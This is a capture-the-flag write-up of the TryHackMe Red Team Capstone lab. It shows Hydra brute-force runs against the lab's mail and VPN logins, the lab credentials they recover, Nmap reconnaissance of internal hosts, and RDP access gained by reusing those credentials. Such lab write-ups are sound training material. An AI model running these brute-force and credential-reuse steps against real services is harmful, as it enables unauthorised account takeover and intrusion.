Permieter Breach

To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active
[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active
[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33

We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt vpn.thereserve.loc http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v                
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Please check your username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active
[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
[STATUS] attack finished for vpn.thereserve.loc (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52

Breach

With these accounts, we can attempt to log into the webmail application, the VPN server (to obtain a VPN file assigned to the users), and, if fortunate, potentially gain Active Directory credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.

After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.

Upon examining the VPN server, we successfully log in and retrieve two `.ovpn` files. The form prompts us to submit an account name. On login, it’s pre-filled with `laura.wood@corp.thereserve.loc`. Testing with my own name in the same format also works successfully.

At the start of the challenge, during the first attempt, the routes were configured correctly, allowing us to successfully reach the internal network IPs 10.200.XXX.21 and 10.200.XXX.22, both of which are WRK machines within the internal network.

WRKX Recon (10.200.XXX.21, 10.200.XXX.22)

Scanning those reveals their FQDN WRK_.corp.thereserve.loc and they have an open RDP port 3389.

An interesting observation is that both machines have Remote Desktop Protocol (RDP, port 3389) open. This suggests that we may be able to log in using the same credentials as their Active Directory accounts if they are consistent.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.21 -T4     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 13:27 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.80% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.45% done; ETC: 13:29 (0:01:52 remaining)
Nmap scan report for 10.200.118.21
Host is up (0.36s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
|   256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_  256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-12T07:59:32+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:27
|_Not valid after:  2025-05-08T10:50:27
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK1
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK1.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-12T07:58:54+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-12T07:58:56
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.22 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:16 IST
Nmap scan report for 10.200.118.22
Host is up (0.38s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 e6:f0:fb:5b:24:28:68:13:da:dd:c5:5f:67:4e:be:4f (RSA)
|   256 93:f5:8f:4c:31:15:fc:8e:38:03:3e:d5:b7:1c:ed:d3 (ECDSA)
|_  256 56:3f:8a:33:a4:1f:dc:11:9a:a1:67:a6:7d:f8:76:18 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK2.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:34
|_Not valid after:  2025-05-08T10:50:34
|_ssl-date: 2024-11-12T08:48:10+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK2
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK2.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-12T08:47:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-11-12T08:47:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.49 seconds

Internal Network Recon

Let's attempt to find other hosts with RDP enabled on the network by using Nmap with the following command:

nmap -p 3389 -Pn 10.200.XXX.1-254 --open

Replace XXX with the appropriate subnet. This command will help us identify any other machines with RDP (port 3389) open.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 3389 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:22 IST
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 10.200.118.21
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 10.200.118.101
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 254 IP addresses (254 hosts up) scanned in 8.42 seconds

Let's attempt to find other hosts with HTTP enabled on the network by using Nmap with the following command:

nmap -p 80,443 -Pn 10.200.XXX.1-254 --open

Replace XXX with the appropriate subnet. This command will help us identify any other machines with RDP (port 3389) open.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 80,443 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:23 IST
Stats: 0:00:11 elapsed; 0 hosts completed (254 up), 254 undergoing Connect Scan
Connect Scan Timing: About 11.22% done; ETC: 14:24 (0:01:27 remaining)
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.30s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for vpn.thereserve.loc (10.200.118.12)
Host is up (0.31s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for web.thereserve.loc (10.200.118.13)
Host is up (0.19s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.200.118.201
Host is up (0.17s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 254 IP addresses (254 hosts up) scanned in 27.00 seconds

After the scan, we identify a fourth machine with ports 80 and 443 exposed, serving an HTTP/HTTPS web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.

By checking the source code, we discover that the web page is associated with the Swift Bank web application, as indicated by the static links present in the JavaScript code.

After adding the hostname to the hosts file, we can now successfully access the Swift Bank web application.

We can also run an Nmap scan against the Swift Bank web application to identify any open ports and services that might be exposed.

┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV swift.bank.thereserve.loc -T4  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)
|   256 7f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)
|_  256 b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)
80/tcp  open  http      nginx 1.18.0 (Ubuntu)
|_http-title: The Reserve Online
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/https
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after:  2023-09-26T13:22:15
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:40 GMT
|     Content-Length: 19
|     page not found
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:36 GMT
|     Content-Length: 19
|     page not found
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:38 GMT
|     Content-Length: 19
|_    page not found
|_http-cors: GET POST DELETE OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.94SVN%T=SSL%I=7%D=11/12%Time=67332708%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-O
SF:ptions:\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:36\x2
SF:0GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(
SF:HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:38\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(FourOh
SF:FourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:40\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(Generi
SF:cLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds

It seems that, for now, we are unable to do much with the application, as only ports 22, 80, and 443 are available.

By using Remmina and reusing the credentials of laura.wood, we successfully establish a connection to the WRK1 machine.

Flags 1 - 3

NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

• Flag 1: Breaching the Perimeter

• Flag 2: Breaching Active Directory

• Flag 3: Foothold on Corporate Division Tier 2 Infrastructure